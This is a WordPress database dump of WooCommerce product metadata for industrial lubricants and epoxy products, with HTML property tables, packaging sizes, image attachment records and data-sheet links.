INSERT INTO `wp_postmeta` VALUES (9854, 956, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"><strong>Typical Properties</strong></td>\r\n<td style="text-align: center;" width="224"><strong>157 FSL</strong></td>\r\n<td style="text-align: center;" width="241"><strong>157 FSH</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Viscosity, cSt @ 40°C (104°F)</strong></td>\r\n<td style="text-align: center;">99.4-149</td>\r\n<td style="text-align: center;">703-1055</td>\r\n</tr>\r\n<tr>\r\n<td><strong>TAN-E mg KOH/g</strong></td>\r\n<td style="text-align: center;">19-35</td>\r\n<td style="text-align: center;">5-15</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Pour Point, °C (°F)</strong></td>\r\n<td style="text-align: center;">-29(-20)</td>\r\n<td style="text-align: center;">-9(15)</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Density, g/mL at -9°C (15°F)</strong></td>\r\n<td style="text-align: center;">1.91</td>\r\n<td style="text-align: center;">1.88</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Molecular Weight</strong></td>\r\n<td style="text-align: center;">2500</td>\r\n<td style="text-align: center;">7000-7500</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9855, 956, '716_default_editor', '<ul>\r\n 	<li>Surfactant</li>\r\n 	<li>Surface Pre-Treatment</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (9856, 956, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9858, 956, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td width="104">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9859, 956, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9860, 956, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9861, 956, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9862, 956, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9863, 956, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9864, 956, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9865, 956, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9866, 956, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9867, 956, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9868, 956, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9869, 956, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9870, 956, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9871, 956, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9872, 956, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9873, 956, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9874, 956, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9875, 956, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9876, 956, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9877, 956, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9878, 956, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9879, 956, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9880, 956, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9881, 956, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9882, 956, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9883, 956, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9884, 956, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9885, 956, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9886, 956, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9887, 956, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (9888, 960, '_edit_lock', '1474296209:2'); 
INSERT INTO `wp_postmeta` VALUES (9889, 960, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9891, 960, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9892, 960, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9893, 960, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"><strong>Typical Properties</strong></td>\r\n<td style="text-align: center;" width="224"><strong>157 FSL</strong></td>\r\n<td style="text-align: center;" width="241"><strong>157 FSH</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Viscosity, cSt @ 40°C (104°F)</strong></td>\r\n<td style="text-align: center;">99.4-149</td>\r\n<td style="text-align: center;">703-1055</td>\r\n</tr>\r\n<tr>\r\n<td><strong>TAN-E mg KOH/g</strong></td>\r\n<td style="text-align: center;">19-35</td>\r\n<td style="text-align: center;">5-15</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Pour Point, °C (°F)</strong></td>\r\n<td style="text-align: center;">-29(-20)</td>\r\n<td style="text-align: center;">-9(15)</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Density, g/mL at -9°C (15°F)</strong></td>\r\n<td style="text-align: center;">1.91</td>\r\n<td style="text-align: center;">1.88</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Molecular Weight</strong></td>\r\n<td style="text-align: center;">2500</td>\r\n<td style="text-align: center;">7000-7500</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9894, 960, '716_default_editor', '<ul>\r\n 	<li>Surfactant</li>\r\n 	<li>Surface Pre-Treatment</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (9895, 960, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9897, 960, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td width="104">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9898, 960, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9899, 960, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9900, 960, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9901, 960, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9902, 960, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9903, 960, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9904, 960, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9905, 960, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9906, 960, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9907, 960, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9908, 960, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9909, 960, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9910, 960, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9911, 960, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9912, 960, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9913, 960, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9914, 960, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9915, 960, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9916, 960, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9917, 960, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9918, 960, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9919, 960, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9920, 960, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9921, 960, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9922, 960, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9923, 960, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9924, 960, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (9951, 960, '_thumbnail_id', '384'); 
INSERT INTO `wp_postmeta` VALUES (9952, 960, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9953, 960, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9954, 961, '_wp_attached_file', '2016/08/krytox-industrial-grease-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9955, 961, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4000;s:4:"file";s:40:"2016/08/krytox-industrial-grease-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-industrial-grease-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"krytox-industrial-grease-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-industrial-grease-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"krytox-industrial-grease-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-industrial-grease-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-industrial-grease-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-industrial-grease-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-industrial-grease-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9956, 962, '_wp_attached_file', '2016/08/164.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9957, 955, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9958, 955, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9959, 955, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9960, 955, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9961, 955, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9962, 955, '318_custom_list_file', 'a:2:{s:32:"3464b732040265186708c5585cb9066c";a:3:{s:4:"name";s:8:"EPON 164";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/164.pdf";s:4:"desc";s:12:"EPON 164 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9963, 955, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (9964, 955, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9965, 955, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9966, 955, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9967, 955, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9968, 955, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9969, 955, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9970, 955, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9971, 955, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9972, 955, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9973, 955, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9974, 955, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9975, 955, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9976, 955, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9977, 955, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9978, 955, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9979, 955, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9980, 955, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9981, 955, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9982, 955, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9983, 955, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9984, 955, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9985, 955, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9986, 955, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9987, 955, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9988, 955, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9989, 955, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9990, 955, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9991, 955, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9992, 955, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9993, 956, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9994, 963, '_wp_attached_file', '2016/08/EPONEX-UV-resistance.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9995, 963, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:32:"2016/08/EPONEX-UV-resistance.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"EPONEX-UV-resistance-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9996, 964, '_wp_attached_file', '2016/08/EPOXY-polyacrylates.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9997, 964, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2797;s:6:"height";i:2315;s:4:"file";s:31:"2016/08/EPOXY-polyacrylates.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"EPOXY-polyacrylates-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"EPOXY-polyacrylates-800x662.jpg";s:5:"width";i:800;s:6:"height";i:662;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"EPOXY-polyacrylates-768x636.jpg";s:5:"width";i:768;s:6:"height";i:636;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"EPOXY-polyacrylates-1600x1324.jpg";s:5:"width";i:1600;s:6:"height";i:1324;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"EPOXY-polyacrylates-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"EPOXY-polyacrylates-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"EPOXY-polyacrylates-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"EPOXY-polyacrylates-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9998, 965, '_wp_attached_file', '2016/08/Krytox-electronic-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9999, 965, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6931;s:6:"height";i:4625;s:4:"file";s:36:"2016/08/Krytox-electronic-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"Krytox-electronic-grease-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Krytox-electronic-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10000, 966, '_wp_attached_file', '2016/08/krytox-electronic-grease-electric.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10001, 966, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5175;s:6:"height";i:3450;s:4:"file";s:45:"2016/08/krytox-electronic-grease-electric.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:47:"krytox-electronic-grease-electric-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"krytox-electronic-grease-electric-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10002, 967, '_edit_lock', '1475066042:2'); 
INSERT INTO `wp_postmeta` VALUES (10003, 967, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10004, 967, '_thumbnail_id', '965'); 
INSERT INTO `wp_postmeta` VALUES (10005, 967, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10006, 967, '_stock_status', 'instock'); 
